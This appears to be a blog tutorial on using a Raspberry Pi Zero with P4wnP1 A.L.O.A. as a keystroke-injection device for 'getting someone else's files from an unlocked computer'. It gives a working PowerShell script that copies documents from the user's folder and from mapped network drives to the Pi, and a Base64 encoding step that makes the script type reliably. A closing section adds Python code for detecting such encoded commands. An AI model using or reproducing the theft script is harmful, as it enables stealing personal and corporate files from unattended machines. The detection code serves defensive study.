P4WNP1 a.l.o.a - Copy Mapped Drive Content to a Pi Zero

P4wnP1 A.L.O.A. running on a Raspberry Pi Zero is perfect for getting someone else's files from an unlocked computer.

Seytonic made a great YouTube video demonstrating how the Pi Zero can act as a keyboard and execute PowerShell commands. Coming from the UK, there is an issue with the keyboard mapping of P4wnP1 A.L.O.A.: '|' (pipe) characters don't type correctly, which breaks the scripts. The mapping issue could be corrected within Kali, but that is boring and doesn't really help when the keyboard language could be non-UK. The alternative is to encode the script as Base64, removing all special characters and guaranteeing better success for any English-based language.


The original script demo'd in the video has been updated to include mapped drives for corporate users.


#HERE'S THE SCRIPT

#logged on user
$wh = whoami
$uName = $wh.Split("\")[1]

#Pi Zero
$usbPath = gwmi win32_volume
$san = $usbPath | where {$_.label -eq "sandisk"} | select name

#Copy local files to Pi
Copy-Item "C:\users\$uName\Documents\*" $san.name -Include "*.txt", "*.docx", "*.xlsx"

#Network mapped drives
$dr = psdrive
$fs = $dr.provider | where {$_.Name -eq "fileSystem"}
$maps = $fs[0].Drives
$first = 10

foreach ($mapin in $maps)
{
    if ($mapin.Name -ne "C")
    {
        Write-Host $mapin
        #first $first matching files, at most one folder level down
        $lf = Get-ChildItem $mapin.root -Recurse -Depth 1 -Include "*.txt","*.docx","*.xlsx" | Select-Object -First $first
        Copy-Item $lf.fullname $san.name -Force
    }
}


HERE'S IT BEING ENCODED TO BASE64

#single-quoted so the $variables inside the script are not expanded
$b64 = '
#logged on user
$wh = whoami
$uName = $wh.Split("\")[1]

#Pi Zero
$usbPath = gwmi win32_volume
$san = $usbPath | where {$_.label -eq "sandisk"} | select name

#Copy local files to Pi
Copy-Item "C:\users\$uName\Documents\*" $san.name -Include "*.txt", "*.docx", "*.xlsx"

#Network mapped drives
$dr = psdrive
$fs = $dr.provider | where {$_.Name -eq "fileSystem"}
$maps = $fs[0].Drives
$first = 10

foreach ($mapin in $maps)
{
    if ($mapin.Name -ne "C")
    {
        Write-Host $mapin
        $lf = Get-ChildItem $mapin.root -Recurse -Depth 1 -Include "*.txt","*.docx","*.xlsx" | Select-Object -First $first
        Copy-Item $lf.fullname $san.name -Force
    }
}
'

#UTF-16LE bytes of the script text, then Base64
$gb = [System.Text.Encoding]::Unicode.GetBytes($b64)
$en = [Convert]::ToBase64String($gb)

$en | Out-File C:\users\Administrator\Desktop\encodeMApped.txt
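
From the defender's side, the encoding step is reversible. The following Python is an added example, not part of the original post: it undoes the same UTF-16LE + Base64 encoding on process command lines and flags the behaviours this script relies on. It assumes the encoded text is handed to PowerShell through its -EncodedCommand parameter (the post does not show the launch step); the sample command lines, the indicator names and the helper names are constructed for illustration.

```python
import base64
import re

# A flag name followed by a Base64-looking argument of useful length.
ARG = re.compile(r"[-/]([A-Za-z]+)\s+([A-Za-z0-9+/]{16,}={0,2})")

# Behaviours of the page's script; cmdlet aliases (gci, copy, ...) not covered.
INDICATORS = {
    "volume enumeration": r"win32_volume",
    "drive enumeration": r"\b(get-)?psdrive\b",
    "recursive listing": r"get-childitem\b.*-recurse",
    "file copy": r"\bcopy-item\b",
}

def encoded_payloads(cmdline):
    """Yield arguments of -EncodedCommand or any accepted abbreviation."""
    for name, blob in ARG.findall(cmdline):
        n = name.lower()
        if n == "ec" or "encodedcommand".startswith(n):
            yield blob

def decode(blob):
    """Reverse the page's encoding: Base64 -> UTF-16LE text, or None."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except ValueError:  # bad Base64 or odd-length/invalid UTF-16
        return None

def triage(cmdline):
    """Return [(decoded_script, [indicator names])] per encoded argument."""
    results = []
    for script in filter(None, map(decode, encoded_payloads(cmdline))):
        hits = [k for k, p in INDICATORS.items() if re.search(p, script, re.I)]
        results.append((script, hits))
    return results

def make_sample(script):
    # Constructed log line, encoded the way the page does it.
    blob = base64.b64encode(script.encode("utf-16-le")).decode("ascii")
    return f"powershell.exe -NoProfile -enc {blob}"

SAMPLE_LINES = [  # constructed process-creation command lines
    make_sample('$v = gwmi win32_volume; Copy-Item "C:\\demo\\*" $v.name'),
    make_sample("Get-Date"),
    r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
]

if __name__ == "__main__":
    print(*map(triage, SAMPLE_LINES), sep="\n")
```

On real telemetry, pass the command-line field of each process-creation event to triage(); enabling PowerShell script block logging records the decoded script as well.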